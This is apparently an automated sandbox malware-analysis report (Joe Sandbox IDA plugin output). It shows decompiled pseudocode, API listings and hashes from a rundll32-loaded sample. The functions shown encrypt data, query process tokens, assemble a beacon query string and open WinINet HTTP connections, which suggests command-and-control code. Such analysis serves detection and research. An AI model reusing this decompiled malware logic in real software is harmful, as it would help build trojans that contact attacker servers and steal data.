							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E02E37A71(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 =  *0x2e3a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x2e3a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 = _t102 + _t90;
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E02E3789E(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}

0x02e347ee
0x02e347f4
0x02e347f7
0x02e347fd
0x02e347fd
0x02e347ff
0x02e34801
0x02e34804
0x02e3480a
0x02e3480b
0x02e3480c
0x02e34812
0x02e34817
0x02e3481d
0x02e34825
0x02e34982
0x02e3482b
0x02e3482d
0x02e34836
0x02e3483b
0x02e3484d
0x02e34850
0x02e34854
0x02e3485b
0x02e3485f
0x02e34867
0x02e3496d
0x02e3486d
0x02e3486d
0x02e34871
0x02e34872
0x02e34874
0x02e3487f
0x02e34959
0x02e34885
0x02e34885
0x02e34888
0x02e3488e
0x02e34894
0x02e34894
0x02e3489c
0x02e3489e
0x02e348a3
0x02e3494a
0x02e348a9
0x02e348af
0x02e348b2
0x02e348b5
0x02e348b7
0x02e348b8
0x02e348bd
0x02e348bf
0x02e348bf
0x02e348c9
0x02e348ce
0x02e348d1
0x02e348d4
0x02e348d6
0x02e348df
0x02e34909
0x02e348e1
0x02e348f2
0x02e348f2
0x02e34911
0x00000000
0x00000000
0x02e34913
0x02e34916
0x02e34919
0x02e3491d
0x00000000
0x02e3491f
0x02e3492e
0x02e34934
0x02e3493c
0x02e3493c
0x00000000
0x02e3491d
0x02e34921
0x02e34927
0x02e3492c
0x02e34943
0x00000000
0x00000000
0x00000000
0x02e3492c
0x02e348a3
0x02e3495c
0x02e3495f
0x02e3495f
0x02e34974
0x02e34974
0x02e3498c

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,02E344FD,00000001,02E33831,00000000), ref: 02E3481D
memcpy.NTDLL(02E344FD,02E33831,00000010,?,?,?,02E344FD,00000001,02E33831,00000000,?,02E322E5,00000000,02E33831,?,775EC740), ref: 02E34836
CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 02E3485F
CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 02E34877
memcpy.NTDLL(00000000,775EC740,04EA9600,00000010), ref: 02E348C9
CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,04EA9600,00000020,?,?,00000010), ref: 02E348F2
GetLastError.KERNEL32(?,?,00000010), ref: 02E34921
GetLastError.KERNEL32 ref: 02E34953
CryptDestroyKey.ADVAPI32(00000000), ref: 02E3495F
GetLastError.KERNEL32 ref: 02E34967
CryptReleaseContext.ADVAPI32(?,00000000), ref: 02E34974
GetLastError.KERNEL32(?,?,?,02E344FD,00000001,02E33831,00000000,?,02E322E5,00000000,02E33831,?,775EC740,02E33831,00000000,04EA9600), ref: 02E3497C

Strings

@MqtNqt, xrefs: 02E34921, 02E34953, 02E34967, 02E3497C

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
String ID: @MqtNqt
API String ID: 3401600162-2883916605
Opcode ID: c59f98af6691e5fdd7296488da8b15dd3aeb0bb0f83baab5dd269562e5e8d27b
Instruction ID: 7c48b7a877ed1f454de7ab557f57b8eb078ff42fdcb6d67ad810115da2cafc0c
Opcode Fuzzy Hash: c59f98af6691e5fdd7296488da8b15dd3aeb0bb0f83baab5dd269562e5e8d27b
Instruction Fuzzy Hash: D9515AB198024DBFDB11DFA5DC88AEEBBB9FB48356F008425F915E6280D7708A54CF60

Uniqueness

Uniqueness Score: -1.00%

Function 02E3737C Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 38%

			E02E3737C(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E02E37A71(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E02E3789E(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x02e37389
0x02e3738a
0x02e3738b
0x02e3738c
0x02e3738d
0x02e37391
0x02e37398
0x02e373a7
0x02e373aa
0x02e373ad
0x02e373b4
0x02e373b7
0x02e373ba
0x02e373bd
0x02e373c0
0x02e373cb
0x02e373cd
0x02e373d6
0x02e373de
0x02e373e0
0x02e373f2
0x02e373fc
0x02e37400
0x02e3740f
0x02e37413
0x02e3741c
0x02e37424
0x02e37424
0x02e37426
0x02e37426
0x02e3742e
0x02e37434
0x02e37438
0x02e37438
0x02e37443

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02E373C3
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02E373D6
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02E373F2

Part of subcall function 02E37A71: RtlAllocateHeap.NTDLL(00000000,00000000,02E34DB1), ref: 02E37A7D

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02E3740F
memcpy.NTDLL(?,00000000,0000001C), ref: 02E3741C
NtClose.NTDLL(?), ref: 02E3742E
NtClose.NTDLL(00000000), ref: 02E37438

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: b56835cc5e642fdfa3625f9d176f400dbdf85e744b286f477a5ae63c8042d214
Instruction ID: d1cfa0a81d2a7afc2192daa475628f051463303caaa4f7c805021f6ff270194d
Opcode Fuzzy Hash: b56835cc5e642fdfa3625f9d176f400dbdf85e744b286f477a5ae63c8042d214
Instruction Fuzzy Hash: 1721F6B2D8021CABDB019FA5CC88ADEBFBDEF08751F108066F905A6110D7B19A54DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 02E33643 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 222
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E02E33643(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t30;
				void* _t31;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t41;
				int _t44;
				intOrPtr _t45;
				int _t48;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr* _t65;
				void* _t66;
				intOrPtr _t71;
				intOrPtr _t77;
				intOrPtr _t80;
				intOrPtr _t83;
				int _t86;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t93;
				int _t96;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				intOrPtr _t107;
				long _t109;
				intOrPtr* _t110;
				intOrPtr* _t111;
				long _t112;
				int _t113;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_t103 = __edx;
				_t99 = __ecx;
				_t120 =  &_v16;
				_t112 = __eax;
				_t30 =  *0x2e3a3e0; // 0x4ea9bc8
				_v4 = _t30;
				_v8 = 8;
				_t31 = RtlAllocateHeap( *0x2e3a2d8, 0, 0x800); // executed
				_t98 = _t31;
				if(_t98 != 0) {
					if(_t112 == 0) {
						_t112 = GetTickCount();
					}
					_t33 =  *0x2e3a018; // 0xe8f22e63
					asm("bswap eax");
					_t34 =  *0x2e3a014; // 0x3a87c8cd
					asm("bswap eax");
					_t35 =  *0x2e3a010; // 0xd8d2f808
					asm("bswap eax");
					_t36 = E02E3A00C; // 0x81762942
					asm("bswap eax");
					_t37 =  *0x2e3a348; // 0x206d5a8
					_t3 = _t37 + 0x2e3b62b; // 0x74666f73
					_t113 = wsprintfA(_t98, _t3, 2, 0x3d186, _t36, _t35, _t34, _t33,  *0x2e3a02c,  *0x2e3a004, _t112);
					_t40 = E02E31308();
					_t41 =  *0x2e3a348; // 0x206d5a8
					_t4 = _t41 + 0x2e3b66b; // 0x74707526
					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
					_t122 = _t120 + 0x38;
					_t114 = _t113 + _t44;
					if(_a12 != 0) {
						_t93 =  *0x2e3a348; // 0x206d5a8
						_t8 = _t93 + 0x2e3b676; // 0x732526
						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
						_t122 = _t122 + 0xc;
						_t114 = _t114 + _t96;
					}
					_t45 =  *0x2e3a348; // 0x206d5a8
					_t10 = _t45 + 0x2e3b2de; // 0x74636126
					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
					_t123 = _t122 + 0xc;
					_t115 = _t114 + _t48; // executed
					_t49 = E02E33DE0(_t99); // executed
					_t105 = _t49;
					if(_t105 != 0) {
						_t88 =  *0x2e3a348; // 0x206d5a8
						_t12 = _t88 + 0x2e3b8c2; // 0x736e6426
						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t91;
						HeapFree( *0x2e3a2d8, 0, _t105);
					}
					_t106 = E02E33ACA();
					if(_t106 != 0) {
						_t83 =  *0x2e3a348; // 0x206d5a8
						_t14 = _t83 + 0x2e3b8ca; // 0x6f687726
						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t86;
						HeapFree( *0x2e3a2d8, 0, _t106);
					}
					_t107 =  *0x2e3a3cc; // 0x4ea9600
					_a20 = E02E34B69(0x2e3a00a, _t107 + 4);
					_t53 =  *0x2e3a36c; // 0x4ea95b0
					_t109 = 0;
					if(_t53 != 0) {
						_t80 =  *0x2e3a348; // 0x206d5a8
						_t17 = _t80 + 0x2e3b889; // 0x3d736f26
						wsprintfA(_t115 + _t98, _t17, _t53);
					}
					if(_a20 != _t109) {
						_t116 = RtlAllocateHeap( *0x2e3a2d8, _t109, 0x800);
						if(_t116 != _t109) {
							E02E353AE(GetTickCount());
							_t59 =  *0x2e3a3cc; // 0x4ea9600
							__imp__(_t59 + 0x40);
							asm("lock xadd [eax], ecx");
							_t63 =  *0x2e3a3cc; // 0x4ea9600
							__imp__(_t63 + 0x40);
							_t65 =  *0x2e3a3cc; // 0x4ea9600
							_t66 = E02E32281(1, _t103, _t98,  *_t65); // executed
							_t119 = _t66;
							asm("lock xadd [eax], ecx");
							if(_t119 != _t109) {
								StrTrimA(_t119, 0x2e39280);
								_push(_t119);
								_t71 = E02E36311();
								_v20 = _t71;
								if(_t71 != _t109) {
									_t110 = __imp__;
									 *_t110(_t119, _v8);
									 *_t110(_t116, _v8);
									_t111 = __imp__;
									 *_t111(_t116, _v32);
									 *_t111(_t116, _t119);
									_t77 = E02E35D05(0xffffffffffffffff, _t116, _v28, _v24); // executed
									_v56 = _t77;
									if(_t77 != 0 && _t77 != 0x10d2) {
										E02E314C6();
									}
									HeapFree( *0x2e3a2d8, 0, _v48);
									_t109 = 0;
								}
								HeapFree( *0x2e3a2d8, _t109, _t119);
							}
							RtlFreeHeap( *0x2e3a2d8, _t109, _t116); // executed
						}
						HeapFree( *0x2e3a2d8, _t109, _a12);
					}
					RtlFreeHeap( *0x2e3a2d8, _t109, _t98); // executed
				}
				return _v16;
			}

0x02e33643
0x02e33643
0x02e33643
0x02e33658
0x02e3365a
0x02e3365f
0x02e33663
0x02e3366b
0x02e33671
0x02e33675
0x02e3367d
0x02e33685
0x02e33685
0x02e33687
0x02e33693
0x02e336a2
0x02e336a7
0x02e336aa
0x02e336af
0x02e336b2
0x02e336b7
0x02e336ba
0x02e336c6
0x02e336d3
0x02e336d5
0x02e336db
0x02e336e0
0x02e336eb
0x02e336ed
0x02e336f0
0x02e336f6
0x02e336f8
0x02e33701
0x02e3370c
0x02e3370e
0x02e33711
0x02e33711
0x02e33713
0x02e33718
0x02e33724
0x02e33726
0x02e33729
0x02e3372b
0x02e33730
0x02e33734
0x02e33736
0x02e3373b
0x02e33747
0x02e33749
0x02e33755
0x02e33757
0x02e33757
0x02e33762
0x02e33766
0x02e33768
0x02e3376d
0x02e33779
0x02e3377b
0x02e33787
0x02e33789
0x02e33789
0x02e3378f
0x02e337a2
0x02e337a6
0x02e337ab
0x02e337af
0x02e337b2
0x02e337b7
0x02e337c1
0x02e337c3
0x02e337ca
0x02e337e2
0x02e337e6
0x02e337f2
0x02e337f7
0x02e33800
0x02e33811
0x02e33815
0x02e3381e
0x02e33824
0x02e3382c
0x02e33831
0x02e3383e
0x02e33844
0x02e33850
0x02e33856
0x02e33857
0x02e3385c
0x02e33862
0x02e33868
0x02e3386f
0x02e33876
0x02e3387c
0x02e33883
0x02e33887
0x02e33892
0x02e33897
0x02e3389d
0x02e338a6
0x02e338a6
0x02e338b7
0x02e338bd
0x02e338bd
0x02e338c7
0x02e338c7
0x02e338d5
0x02e338d5
0x02e338e6
0x02e338e6
0x02e338f4
0x02e338f4
0x02e33905

APIs

RtlAllocateHeap.NTDLL ref: 02E3366B
GetTickCount.KERNEL32 ref: 02E3367F
wsprintfA.USER32 ref: 02E336CE
wsprintfA.USER32 ref: 02E336EB
wsprintfA.USER32 ref: 02E3370C
wsprintfA.USER32 ref: 02E33724
wsprintfA.USER32 ref: 02E33747
HeapFree.KERNEL32(00000000,00000000), ref: 02E33757
wsprintfA.USER32 ref: 02E33779
HeapFree.KERNEL32(00000000,00000000), ref: 02E33789
wsprintfA.USER32 ref: 02E337C1
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02E337DC
GetTickCount.KERNEL32 ref: 02E337EC
RtlEnterCriticalSection.NTDLL(04EA95C0), ref: 02E33800
RtlLeaveCriticalSection.NTDLL(04EA95C0), ref: 02E3381E

Part of subcall function 02E32281: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,02E33831,00000000,04EA9600), ref: 02E322AC
Part of subcall function 02E32281: lstrlen.KERNEL32(00000000,?,775EC740,02E33831,00000000,04EA9600), ref: 02E322B4
Part of subcall function 02E32281: strcpy.NTDLL ref: 02E322CB
Part of subcall function 02E32281: lstrcat.KERNEL32(00000000,00000000), ref: 02E322D6
Part of subcall function 02E32281: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02E33831,?,775EC740,02E33831,00000000,04EA9600), ref: 02E322F3

StrTrimA.SHLWAPI(00000000,02E39280,00000000,04EA9600), ref: 02E33850

Part of subcall function 02E36311: lstrlen.KERNEL32(04EA9BB8,00000000,00000000,00000000,02E3385C,00000000), ref: 02E36321
Part of subcall function 02E36311: lstrlen.KERNEL32(?), ref: 02E36329
Part of subcall function 02E36311: lstrcpy.KERNEL32(00000000,04EA9BB8), ref: 02E3633D
Part of subcall function 02E36311: lstrcat.KERNEL32(00000000,?), ref: 02E36348

lstrcpy.KERNEL32(00000000,?), ref: 02E3386F
lstrcpy.KERNEL32(00000000,?), ref: 02E33876
lstrcat.KERNEL32(00000000,?), ref: 02E33883
lstrcat.KERNEL32(00000000,00000000), ref: 02E33887

Part of subcall function 02E35D05: WaitForSingleObject.KERNEL32(00000000,747581D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02E35DB7

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02E338B7
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02E338C7
RtlFreeHeap.NTDLL(00000000,00000000,00000000,04EA9600), ref: 02E338D5
HeapFree.KERNEL32(00000000,?), ref: 02E338E6
RtlFreeHeap.NTDLL(00000000,00000000), ref: 02E338F4

Strings

Uqt, xrefs: 02E33757, 02E33789, 02E338B7, 02E338C7, 02E338D5, 02E338E6, 02E338F4

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
String ID: Uqt
API String ID: 186568778-2320327147
Opcode ID: d19ce59158a6759f6674b516f873f46793392730b7b4b66eee365acd50264738
Instruction ID: 91dae4df2a5b00f9bcfa475d0c138e045b9b4487315665c763a7ea01dde6e509
Opcode Fuzzy Hash: d19ce59158a6759f6674b516f873f46793392730b7b4b66eee365acd50264738
Instruction Fuzzy Hash: A871C1718C0208AFC712AB66DC4CE5B3BE9EB88706B450968F849D3221D732D9E4DF61

Uniqueness

Uniqueness Score: -1.00%

Function 02E37B59 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 126
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E02E37B59(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E02E37A71(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E02E3789E(_t56);
					} else {
						E02E3789E( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E02E37AEE) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E02E32129( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x2e3a348; // 0x206d5a8
						_t15 = _t59 + 0x2e3b73b; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}

0x02e37b59
0x02e37b59
0x02e37b64
0x02e37b6b
0x02e37b73
0x02e37b7d
0x02e37b83
0x02e37b96
0x02e37ba6
0x02e37b98
0x02e37b9b
0x02e37ba0
0x02e37ba0
0x02e37b96
0x02e37bb6
0x02e37bbc
0x02e37bc1
0x02e37caa
0x00000000
0x02e37bdc
0x02e37bdf
0x02e37bf2
0x02e37bf8
0x02e37bfd
0x02e37c25
0x02e37c38
0x02e37c42
0x02e37c45
0x02e37c4b
0x02e37c50
0x00000000
0x00000000
0x02e37c54
0x02e37c60
0x02e37c71
0x02e37c73
0x02e37c84
0x02e37c84
0x02e37c94
0x00000000
0x02e37ca6
0x00000000
0x02e37ca6
0x00000000
0x00000000
0x00000000
0x02e37bfd

APIs

lstrlen.KERNEL32(?,00000008,74714D40), ref: 02E37B6B

Part of subcall function 02E37A71: RtlAllocateHeap.NTDLL(00000000,00000000,02E34DB1), ref: 02E37A7D

InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 02E37B8E
InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 02E37BB6
InternetSetStatusCallback.WININET(00000000,02E37AEE), ref: 02E37BCD
ResetEvent.KERNEL32(?), ref: 02E37BDF
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 02E37BF2
GetLastError.KERNEL32 ref: 02E37BFF
HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 02E37C45
InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 02E37C63
InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 02E37C84
InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 02E37C90
InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 02E37CA0
GetLastError.KERNEL32 ref: 02E37CAA

Part of subcall function 02E3789E: RtlFreeHeap.NTDLL(00000000,00000000,02E34E3E,00000000,?,00000000,00000000), ref: 02E378AA

Strings

@MqtNqt, xrefs: 02E37BFF, 02E37CAA

Memory Dump Source

Source File: 00000004.00000002.816962986.0000000002E31000.00000020.10000000.00040000.00000000.sdmp, Offset: 02E30000, based on PE: true

Associated: 00000004.00000002.816950533.0000000002E30000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816981198.0000000002E39000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816986755.0000000002E3A000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000004.00000002.816995975.0000000002E3C000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2e30000_rundll32.jbxd

Similarity

API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
String ID: @MqtNqt
API String ID: 2290446683-2883916605
Opcode ID: 4253aa31f66854b6ed30e97c0095cca479d1b2ae728b6819e460555baee50a59
Instruction ID: 19cee5ed5d867799dc163d657bd2ce9f9693a920a8632fc1e1b96d7f8cfb6179
Opcode Fuzzy Hash: 4253aa31f66854b6ed30e97c0095cca479d1b2ae728b6819e460555baee50a59
Instruction Fuzzy Hash: D941B6B1980648BFD7329F62DD8CE9FBBBDEB44706F108928F542D1150E7319594CB20

Uniqueness

Uniqueness Score: -1.00%

Function 02E3517A Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 151
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E02E3517A(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x2e3a2e0);
					_v76 = 0;
					_v80 = 0;
					L02E382AA();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x2e3a30c; // 0x2c0
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x2e3a2ec = 5;
						} else {
							_t69 = E02E361FE(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x2e3a300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E02E364A2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v124.HighPart = E02E36821(_t75,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x2e3a2e4);
							goto L21;
						} else {
							__eflags =  *0x2e3a2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E02E314C6();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x2e3a2e8);
								L21:
								L02E382AA();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x2e3a2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

0x02e3517a
0x02e35190
0x02e35194
0x02e35199
0x02e351a0
0x02e351a6
0x02e351ac
0x02e35333
0x02e351b2
0x02e351b2
0x02e351b4
0x02e351b9
0x02e351ba
0x02e351c0
0x02e351c4
0x02e351c8
0x02e351d6
0x02e351e4
0x02e351e8
0x02e351ea
0x02e351f7
0x02e35203
